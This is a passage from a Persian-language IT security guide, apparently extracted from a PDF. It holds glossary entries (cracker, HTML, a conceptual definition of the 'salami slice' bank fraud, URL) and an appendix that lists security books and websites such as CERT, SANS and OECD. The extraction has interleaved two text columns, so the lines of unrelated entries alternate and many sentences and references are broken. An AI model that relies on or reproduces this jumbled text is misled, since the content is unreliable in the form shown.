‫ﻟﺬﺕ ﻣﻲﺑﺮﺩ‪ .‬ﺍﻳﻦ ﻭﺍﮊﻩ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﻛﺴﻲ ﻛﻪ ﺑﺎ ﻗﺼﺪ ﺑـﺪ ﺍﻗـﺪﺍﻡ‬ ‫ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺣﻮﺯﺓ ﺑﺮﻕ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﺪﻭﻳﻦ‬
‫ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻣﻲﻛﻨـﺪ ﻭ ﺑـﺪﻭﻥ‬ ‫ﻻ ﺗﺒـﺪﻳﻞ ﺑـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ‬
‫ﻣﻲﻛﻨﺪ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺁﻥ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺠﻮﺯ ﺻﺎﺣﺐ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺷﻮﺩ ﻧﻴﺰ ﺍﻃـﻼﻕ ﻣـﻲﮔـﺮﺩﺩ‪.‬‬ ‫ﻣﻠﻲ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺗﻌﺪﺍﺩﻱ ﻣﺠﻠﻪ ﻣﻨﺘـﺸﺮ‬
‫ﻭﺍﮊﺓ "ﻗﻔﻞﺷﻜﻦ" ﺑﺮﺍﻱ ﻣﻌﻨﺎﻱ ﺻﺮﻓﹰﺎ ﻣﻨﻔﻲ ﺍﻳﻦ ﻋﺒﺎﺭﺕ ﻣﻨﺎﺳـﺒﺘﺮ‬ ‫ﻣﻲﻛﻨﺪ‪ ،‬ﺷﺎﺧﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺯﻳﺎﺩﻱ ﺩﺭ ﻗـﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺩﻧﻴـﺎ‬
‫ﺍﺳﺖ‪) .‬ﺑﻪ ﺗﻮﺿﻴﺤﺎﺕ ﻭﺍﮊﺓ ﻗﻔﻞﺷﻜﻦ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪(.‬‬ ‫ﺩﺍﺭﺩ‪ ،‬ﻭ ﺩﺍﺭﺍﻱ ﺟﻮﺍﻣﻊ ﺑﺰﺭﮒ ﺑﺴﻴﺎﺭﻱ ﺩﺭ ﻣﺤﺪﻭﺩﻩﻫﺎﻱ ﺗﺨﺼﺼﻲ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﻱ ‪ .IEEE‬ﺑﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮ‬ ‫ﻣﻲﺑﺎﺷﺪ‪ ،‬ﻣﺜﻞ ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍ ﹺ‬


‫‪٤٨١‬‬
‫‪HTML‬‬
‫ﺑﻪ ﻣﺮﻭﺭﮔﺮ ﻭﺏ ﻳﺎ ﺑﺮﻧﺎﻣﺔ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻲﮔﻮﻳﺪ ﻛﻪ ﭼﮕﻮﻧﻪ‬
‫ﻣﺘﻮﻥ ﻭ ﺗﺼﺎﻭﻳﺮ ﺭﺍ ﻧﻤﺎﻳﺶ ﺩﻫﻨﺪ ﻭ ﻳﺎ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳـﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ‬ ‫‪474 Virus‬‬
‫‪475 Spam‬‬
‫‪476 Total Cost of Ownership‬‬
‫‪477 Data Integrity‬‬
‫‪480 Internet Engineering Task Force‬‬ ‫‪478 Institution of Electrical and Electronics Engineers‬‬
‫‪481 Hyper Text Mark-up Language‬‬ ‫‪479 Wireless Local Area Networks‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٦٦‬‬

‫ﺩﻳﮕﺮﻱ ﺑﺪﻫﺪ‪ .‬ﺩﺭ ﻳﻚ ﭼﻨﻴﻦ ﺯﺑﺎﻧﻲ ﺩﺳﺘﻮﺭﺍﺕ ﻭ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ‬


‫ﺩﺭﻭﻥ ﻣﺘﻦ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﻣﻲﺁﻳﻨﺪ ﻭ ﭼﺎﭖ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻧﻤﻮﻧـﻪﺍﻱ ﺍﺯ‬
‫ﻳﻚ ﺩﺳﺘﻮﺭ ﺩﺭ ﺍﻳﻦ ﺯﺑﺎﻧﻬﺎ ﻣﺸﺎﺑﻪ ﺯﻳﺮ ﺍﺳﺖ‪:‬‬

‫‪This sentence is <<Start Bold>>very<<End‬‬


‫‪Bold>> short.‬‬

‫ﺯﻣﺎﻧﻲ ﻛﻪ ﺍﻳـﻦ ﺟﻤﻠـﻪ ﻧﻤـﺎﻳﺶ ﺩﺍﺩﻩ ﻣـﻲﺷـﻮﺩ‪ ،‬ﻛﻠﻤـﺎﺕ ﻣﻴـﺎﻥ‬


‫>><< ﺑﻌﻨﻮﺍﻥ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﻣﻲ ﺷـﻮﻧﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ‬
‫ﺟﻤﻠﻪ ﺑﺼﻮﺭﺕ ﺯﻳﺮ ﺑﻪ ﻧﻤﺎﻳﺶ ﺩﺭ ﺧﻮﺍﻫﺪ ﺁﻣﺪ‪:‬‬

‫‪This Sentence is very short.‬‬

‫‪Salami Slice‬‬
‫ﻳﻚ ﺭﻭﺵ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺳﺮﻣﺎﻳﻪ‪ .‬ﺩﺭ ﺍﻳﻦ‬
‫ﺭﻭﺵ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺣﺴﺎﺑﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺗـﺴﺨﻴﺮ ﻣـﻲﺷـﻮﺩ‪ ،‬ﻭ‬
‫ﺳﭙﺲ ﻣﺒﻠﻎ ﻧﺎﭼﻴﺰﻱ ﺍﺯ ﻫﺮ ﺣﺴﺎﺏ ﺍﻋﺘﺒﺎﺭ ﻛﻢ ﻣﻲﮔﺮﺩﺩ ﺗﺎ ﭼﻴﺰﻱ‬
‫ﻣﺸﻜﻮﻙ ﺑﻨﻈﺮ ﻧﻴﺎﻳﺪ‪ ،‬ﻭ ﻣﺠﻤﻮﻉ ﺍﻋﺘﺒﺎﺭﺍﺕ ﻛﺎﺳﺘﻪﺷﺪﻩ ﻫﻤﮕﻲ ﺑﻪ‬
‫ﻳﻚ ﺣﺴﺎﺏ ﺧﺎﺹ ﻭﺍﺭﻳﺰ ﻣﻲﺷﻮﻧﺪ‪.‬‬

‫‪٤٨٢‬‬
‫‪URL‬‬
‫ﻼ‪:‬‬
‫ﻳﻚ ﺁﺩﺭﺱ ﻛﻠﻲ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻣﺤﻞ ﭼﻴﺰﻱ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ‪ .‬ﻣﺜ ﹰ‬

‫‪http://www.infodev.org‬‬
‫‪mailto:infodev@worldbank.org‬‬

‫‪482 Universal Resource Locator‬‬


٤٦٧ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

:‫ﺭﻫﻨﻤﻮﺩﻫﺎﻱ ﺩﻭﻟﺖ ﺑﺮﺍﻱ ﺗﻮﺳﻌﺔ ﺟﺎﻣﻌﻪ ﺍﻃﻼﻋﺎﺗﻲ‬


http://www.innovazione.gov.it/eng/documenti
/linee_guida_eng.shtml

‫ﭘﺎﻳﮕــﺎﻩ ﺗﺠــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺳــﺎﺯﻣﺎﻥ ﻫﻤﻜــﺎﺭﻱ ﻭ ﺗﻮﺳــﻌﺔ‬


:٤٨٥(OECD) ‫ﺍﻗﺘﺼﺎﺩﻱ‬ ۲ ‫ﭘﻴﻮﺳﺖ‬
http://www.oecd.org/EN/home/0,,EN-home-
29-nodirectorate-no-no-no-29,00.html ‫ﻛﺘﺎﺑﻨﺎﻣﻪ‬
OECD ‫ﺻﻔﺤﺔ ﻭﺏ ﻣﻄﺎﻟﻌﺎﺕ ﮔﺴﺘﺮﺵ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺍﻳﻦ ﭘﻴﻮﺳﺖ ﺷﺎﻣﻞ ﻣﻨﺎﺑﻌﻲ ﺍﺳﺖ ﻛﻪ ﺑﺮﺍﻱ ﻧﮕﺎﺭﺵ ﻣـﺘﻦ ﺍﺻـﻠﻲ‬
:(۲۰۰۲) ‫ ﺑﺮﺍﻱ ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻣﻨﺎﺑﻊ ﺑﻴﺸﺘﺮ‬.‫ﻛﺘﺎﺏ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻧﺪ‬
http://www.oecd.org/EN/home/0,,EN-
document-273-nodirectorate-no-15-36384- .‫ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‬۵ ‫ ﻭ‬۴ ‫ ﻭ‬۳ ‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﻴﻮﺳﺘﻬﺎﻱ‬
29,00.html
Practical Unix & Internet Security, by Simson
:OECD ‫ﺻﻔﺤﺔ ﻭﺏ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‬ Garfinkel, Gene Spafford, and Alan
Schwartz (O’Reilly & Associates, Inc.: CA, 2003)
http://www.oecd.org/EN/about/0,,EN-about-
301-nedirectorate-no-no-no-13,00.html
Web Security, Privacy & Commerce, by
Simson Garfinkel with Gene Spafford (O’Reilly
:OECD ‫ﺻﻔﺤﺔ ﻭﺏ ﺳﻴﺎﺳﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃﺎﺕ‬ & Associates, Inc.: CA, 2002)
http://www.oecd.org/EN/about/0,,EN-home-
40-nedirectorate-no-no-no-29,00.html. IT Security: Risking the Corporation, by
Linda McCarthy, Forward by Gene Spafford
:‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﮔﺮﻭﻩ ﭘﻴﺸﮕﺎﻣﺎﻥ ﺟﻬﺎﻧﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻳﻨﺘﺮﻧﺖ‬ (Prentice Hall PTR: NJ, 2003)
http://www.gipiproject.org/
‫ﺑﺨﺶ ﺍﻭﻝ‬
:‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﻛﺰ ﻓﻨﺎﻭﺭﻱ ﻭ ﺩﻣﻮﻛﺮﺍﺳﻲ‬
http://www.cdt.org :‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺑﻨﻴﺎﺩ ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﺟﻬﺎﻧﻲ‬
http://www.markle.org/globalpolicy/index.html
‫ﻭ ﻫﻤﭽﻨﻴﻦ ﺻﻔﺤﺎﺗﻲ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻱ ﺟﺎﻣﻊ ﺩﻭﻟﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛـﻪ‬ ‫ ﻭ‬٤٨٣(DOT) ‫ﺷﺎﻣﻞ ﺑﺮﻧﺎﻣﺔ ﻛﻤﻴﺘﺔ ﻛﺎﺭﻱ ﻓﺮﺻـﺘﻬﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ‬
:‫ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ‬infodev ‫ﺑﺎ ﻫﻤﻜﺎﺭﻱ‬ .٤٨٤‫ﻣﻄﺎﻟﻌﺎﺕ ﻟﻮﺩﺭ ﻭﻭﻳﺴﺰ‬
http://www.cdt.org/egov/handbook
:‫ﮔﺰﺍﺭﺷﻬﺎﻱ ﻛﻤﻴﺘﺔ ﻛﺎﺭﻱ ﻓﺮﺻﺘﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ‬
:‫ﺍﺯ ﻣﺘﻮﻥ ﭘﻲﻧﻮﺷﺘﻬﺎﻱ ﺑﺨﺶ ﺍﻭﻝ‬
http://www.dotforce.org/teams
http://www.dotforce.org/about/
‫ﻛﻪ ﺷﺎﻣﻞ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺳـﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻫـﻢ‬
‫ ﺍﺟـﻼﺱ ﺟﻬـﺎﻧﻲ ﺳـﺮﺍﻥ ﺟﺎﻣﻌـﺔ‬،‫ﭘﻴــﺶﻧﻮﻳـﺲ ﺑﻴﺎﻧﻴـﺔ ﺍﺻﻮﻝ‬ :‫ﻣﻲﺷﻮﺩ‬
،WSIS03/PCIP/DT/4(Rev.3)-E ‫ ﺳـــﻨﺪ‬،‫ﺍﻃﻼﻋـــﺎﺗﻲ‬ http://www.dotforce.org/reports/documents/6
5/E-Strategies_e.pdf
.DOT ‫ﻣﺮﺑﻮﻁ ﺑﻪ ﻛﻤﻴﺘﺔ‬
‫ﻫﻤﭽﻨــﻴﻦ ﻣــﻲﺗﻮﺍﻧﻴــﺪ ﺑــﻪ ﺷــﺒﻜﺔ ﻣﻨــﺎﺑﻊ ﺗﻮﺳــﻌﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

Moore, Paxson, Savage, Shannon, Staniford


and Weaver, Inside the Slammer Worm,
:‫ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ‬
IEEE Security and Privacy, Vol. 1, No. 4, http://www.dotforce.org/teams/IeDRNBusine
July/August 2003, pp. 33-39 ssPlan.ppt

485 Organization for Economic Cooperation and 483 Digital Opportunity Task Force
Development 484 Louder Voices Study
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٦٨‬‬

‫ﻣﺮﻛﺰ ﻣﻄﺎﻟﻌﺎﺕ‪ ٤٨٦‬ﻣﺆﺳﺴﻪ ‪:SANS‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‬


‫‪http://www.sans.org/rr/catindex.php?cat_id=48‬‬
‫‪ IEEE‬ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺣـﻮﺯﺓ ﺑـﺮﻕ ﻭ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻳﻜﻲ ﺍﺯ ﻣﻌﺘﺒﺮﺗﺮﻳﻦ ﻣﺮﺍﻛﺰ ﺍﻣﻨﻴﺘﻲ ﺩﻧﻴﺎ‪:‬‬
‫‪http://www.securityfocus.com‬‬ ‫ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﺪﻭﻳﻦ ﻣﻲﻛﻨـﺪ ﻭ ﻛـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺁﻥ‬
‫ﻻ ﺗﺒﺪﻳﻞ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻣﻠﻲ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻣـﻲﺷـﻮﻧﺪ‪.‬‬‫ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺯﻳﺎﺩﻱ ﺑﺮﺍﻱ ﻧﻈﺎﺭﺕ ﺑﺮ ﻛﺎﺭﺑﺮﺩ‬ ‫ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺗﻌﺪﺍﺩﻱ ﻣﺠﻠﻪ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ‪ ،‬ﺷﺎﺧﻪﻫـﺎﻱ ﻣﺤﻠـﻲ‬
‫ﻭ ﻣﺪﻳﺮﻳﺖ ﺳﺎﻳﺮ ﺟﻨﺒﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺭﺍﻳﮕـﺎﻥ‬ ‫ﺯﻳﺎﺩﻱ ﺩﺭ ﻗﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺩﻧﻴﺎ ﺩﺍﺭﺩ‪ ،‬ﻭ ﺩﺍﺭﺍﻱ ﺟﻮﺍﻣـﻊ ﺑـﺰﺭﮒ‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪:‬‬ ‫ﺑﺴﻴﺎﺭﻱ ﺩﺭ ﻣﺤﺪﻭﺩﻩﻫـﺎﻱ ﺗﺨﺼـﺼﻲ ﻣـﻲﺑﺎﺷـﺪ‪ ،‬ﻣﺜـﻞ ﺟﺎﻣﻌـﺔ‬
‫‪http://www.sysinternals.com‬‬
‫ﺭﺍﻳﺎﻧﻪ ﺍﻱ‪ .‬ﺑـﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﻣـﻮﺭﺩ ‪ IEEE‬ﻭ ﺟﺎﻣﻌـﺔ‬
‫ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ‪:Unix‬‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪:‬‬
‫‪http://www.deter.com/unix/index.htmlm‬‬ ‫‪http://standard.ieee.org‬‬
‫‪http://www.computer.org‬‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺑﻲ ﻛﻪ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﻓﻬﺮﺳﺘﻬﺎﻱ ﭘـﺴﺘﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﭼﻨـﺪ‬
‫ﺍﻃﻼﻋــﺎﺗﻲ ﭼــﻮﻥ ﺗﻌــﺎﺭﻳﻒ ﻭ ﺍﻟﺰﺍﻣــﺎﺕ ﻋﻤﻠﻜــﺮﺩ ‪ 802.11‬ﺭﺍ‬
‫ﺍﺑﺰﺍﺭ ﺍﻣﻨﻴﺘﻲ ﻣﺸﻬﻮﺭ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪:‬‬
‫‪http://msgs.securepoint.com‬‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ‪:‬‬
‫‪http://grouper.ieee.org/groups/802/11/Docu‬‬
‫ﺻﻔﺤﻪﺍﻱ ﺍﺯ ‪ CERT‬ﻛﻪ ﺑﺮﺍﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪Unix‬‬ ‫‪ments/DocumentArchieves/1992_docs/1192‬‬
‫‪091.DOC‬‬
‫ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪:‬‬
‫‪http://www.cert.org/tech_tips/unix_configurat‬‬ ‫ﺍﺳــﺘﺎﻧﺪﺍﺭﺩ ‪ unicode‬ﺑــﺮﺍﻱ ﺍﻳــﻦ ﺑﻮﺟــﻮﺩ ﺁﻣــﺪ ﻛــﻪ ﺗﻮﻟﻴــﺪ‬
‫‪ion_guidelines.html‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻭ ﭘﺮﺩﺍﺯﺵ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺯﺑﺎﻧﻬـﺎﻱ ﺭﺍﻳـﺞ‬
‫ﺻﻔﺤﻪﺍﻱ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﻛﺰ ‪ CERT‬ﻛـﻪ ﺑـﺮﺍﻱ ﭘﻴﻜﺮﺑﻨـﺪﻱ‬ ‫ﺩﻧﻴﺎ ﺭﺍ ﺗﺴﻬﻴﻞ ﻛﻨـﺪ‪ .‬ﺳـﻨﺪ ﺯﻳـﺮ ﺗﺎﺭﻳﺨﭽـﺔ ﺑﻮﺟـﻮﺩ ﺁﻣـﺪﻥ ﺍﻳـﻦ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ‪ Windows‬ﺧﻂﻣﺸﻲﻫﺎﻳﻲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪:‬‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﻣﻴﺎﻥ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﻭ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ‬
‫‪http://www.cert.org/tech_tips/win_configurati‬‬ ‫)‪ (ISO‬ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳـﻦ ﻣﻘﺎﻟـﻪ ﺍﻫـﺪﺍﻑ ﻭ ﺍﺻـﻮﻝ ﻃﺮﺍﺣـﻲ‬
‫‪on_guidelines.html‬‬ ‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ unicode‬ﺭﺍ ﺗﻮﺻﻴﻒ ﻣـﻲﻧﻤﺎﻳـﺪ‪ ،‬ﻭ ﻫﻤﭽﻨـﻴﻦ ﺭﻭﻱ‬
‫ﺻﻔﺤﻪﺍﻱ ﺍﺯ ﺭﺍﻩﺣﻠﻬﺎﻳﻲ ﻛﻪ ‪ CERT‬ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻧـﺸﺎﻧﻬﺎﻱ‬ ‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺤﺚ ﻣﻲﻛﻨﺪ ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻛﺎﺭﺑﺮﺩﻱ ﭼﮕﻮﻧﻪ ﺑﺎﻳـﺪ‬
‫ﻳﻚ ﺗﻬﺎﺟﻢ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ‪:‬‬ ‫ﺍﺯ ﺍﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨـﺪ‪ .‬ﺍﻳـﻦ ﻣﻘﺎﻟـﻪ ﺑـﺎ ﻣﻌﺮﻓـﻲ ﺑﺮﺧـﻲ‬
‫‪http://www.cert.org/security-‬‬ ‫ﺭﺍﻫﻜﺎﺭﻫﺎ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ unicode‬ﻭ ﻧﻴـﺰ ﻳـﻚ ﺗﻮﺿـﻴﺢ ﺩﺭ‬
‫‪improvement/modules/m09.html‬‬ ‫ﻣﻮﺭﺩ ﻧﺤـﻮﺓ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ‪ unicode‬ﺩﺭ ﻣﺤـﺼﻮﻻﺕ ﺷـﺮﻛﺖ‬
‫ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﻪ ﭘﺎﻳﺎﻥ ﻣﻲﺭﺳﺪ‪ .‬ﺗﺼﻤﻴﻢ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﻣﺒﻨﻲ ﺑـﺮ‬
‫ﺻﻔﺤﺔ ﻭﺏ ﭘﺮﻭﮊﺓ ‪ FreeFire‬ﺑﺮﺍﻱ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﮕﺎﻥ‪:‬‬
‫‪http://sites.inka.de/lina/freefire-‬‬ ‫ﻛﺎﺭﺑﺮﺩ ﻳﻚ ﻣﺠﻤﻮﻋﻪ ﺣﺮﻭﻑ ﻭﺍﺣﺪ ﺑﻌﻨﻮﺍﻥ ﻛﺎﺭﺍﻛﺘﺮﻫـﺎﻱ ﺍﺻـﻠﻲ‬
‫‪l/index.en.html‬‬ ‫ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪ ،Windows NT‬ﻳﻜﻲ ﺍﺯ ﻋﻮﺍﻣﻞ ﻋﻤﺪﺓ ﻣﻮﻓﻘﻴﺖ‬
‫‪ unicode‬ﺍﺳﺖ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳـﺮ‬
‫ﻭ ﻳﻚ ﺻﻔﺤﺔ ﻭﺏ ﺷﺎﻣﻞ ﺗﻮﺻﻴﻪﻫﺎ ﻭ ﺭﺍﻫﻨﻤﺎﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺗﺤﻠﻴـﻞ‬
‫ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫ﻣﺤﺘﻮﻳﺎﺕ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺳﻴﺴﺘﻢ‪:‬‬
‫‪http://research.compaq.com/wrl/DECarchive‬‬
‫‪http://www.counterpane.com/log-‬‬ ‫‪s/DTJ/DTJB02/DTJB02SC.TXT‬‬
‫‪analysis.html‬‬
‫ﻣﻄﺎﻟﺐ ﺑﻴﺸﺘﺮ ﺩﺭ ﻣﻮﺭﺩ ﺟﻨﺒﻪﻫﺎﻱ ﻓﻨﻲ ﺍﻣﻨﻴـﺖ ﺭﺍ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺩﺭ‬
‫ﺁﺩﺭﺳﻬﺎﻱ ﻭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ‪:‬‬

‫‪486 Reading Room‬‬


‫‪٤٦٩‬‬ ‫ﭘﻴﻮﺳﺘﻬﺎ‬

‫ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﺳﺎﺯﻣﺎﻧﻬﺎ‪ ،‬ﻣﻤﻴﺰﻫـﺎ ﻭ ﺭﺍﻫﺒـﺮﺍﻥ ﺳﻴـﺴﺘﻤﻬﺎﻱ‬ ‫ﺑﺨﺶ ﺳﻮﻡ‬


‫ﺍﻃﻼﻋﺎﺗﻲ‪ ،‬ﻭ ﻧﻴﺰ ﺣﻘﻮﻗﺪﺍﻧﺎﻥ‪ ،‬ﻳﻚ ﺑﺴﺘﺮ ﻣﺮﺟﻊ ﺩﺭ ﻣـﻮﺭﺩ ﺍﻣﻨﻴـﺖ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪.‬‬ ‫‪The Human Development Report 2001:‬‬
‫‪Making New Technologies Work for Human‬‬
‫‪Development” (UNDP: NY, 2001).‬‬
‫ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ‪ ISACA‬ﺩﻳﺪ ﻣﻨﺎﺳﺒﻲ ﺩﺭ ﻣﻮﺭﺩ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ‬
